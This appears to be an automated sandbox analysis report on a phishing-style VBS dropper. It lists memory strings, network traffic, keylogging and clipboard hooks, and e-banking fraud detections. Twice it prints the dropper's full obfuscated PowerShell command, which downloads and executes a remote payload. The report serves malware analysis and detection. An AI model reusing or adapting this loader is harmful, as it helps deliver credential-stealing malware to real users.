Source: powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2604146948.000001DB95BFC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.mic
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.2668709649.000001DBA5DCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 50573 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50573
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:50573 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 16_2_0041183A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 16_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 17_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 17_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 18_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 18_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

System Summary

barindex
Source: amsi32_3892.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3892, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Initial file: Call Cringingness.ShellExecute("P" & Papirdokumenter, penates, "", "", Luggnagg51)
Source: TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3851
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3851
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3851 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3851 Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_04B422D5 Sleep,NtProtectVirtualMemory, 11_2_04B422D5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401806 NtdllDefWindowProc_W, 16_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004018C0 NtdllDefWindowProc_W, 16_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004016FD NtdllDefWindowProc_A, 17_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004017B7 NtdllDefWindowProc_A, 17_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00402CAC NtdllDefWindowProc_A, 18_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00402D66 NtdllDefWindowProc_A, 18_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348AB516 2_2_00007FFD348AB516
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348AC2C2 2_2_00007FFD348AC2C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348A3DFA 2_2_00007FFD348A3DFA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EB7194 11_2_20EB7194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EAB5C1 11_2_20EAB5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B040 16_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0043610D 16_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00447310 16_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044A490 16_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040755A 16_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0043C560 16_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B610 16_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044D6C0 16_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004476F0 16_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B870 16_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044081D 16_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414957 16_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004079EE 16_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00407AEB 16_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044AA80 16_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00412AA9 16_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404B74 16_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404B03 16_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044BBD8 16_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404BE5 16_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404C76 16_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00415CFE 16_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00416D72 16_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00446D30 16_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00446D8B 16_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00406E8F 16_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00405038 17_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0041208C 17_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004050A9 17_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0040511A 17_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0043C13A 17_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004051AB 17_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00449300 17_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0040D322 17_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044A4F0 17_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0043A5AB 17_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00413631 17_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00446690 17_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044A730 17_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004398D8 17_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004498E0 17_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0044A886 17_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0043DA09 17_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00438D5E 17_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00449ED0 17_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_0041FE83 17_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00430F54 17_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004050C2 18_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004014AB 18_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00405133 18_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004051A4 18_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00401246 18_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_0040CA46 18_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00405235 18_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_004032C8 18_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00401689 18_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00402F60 18_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
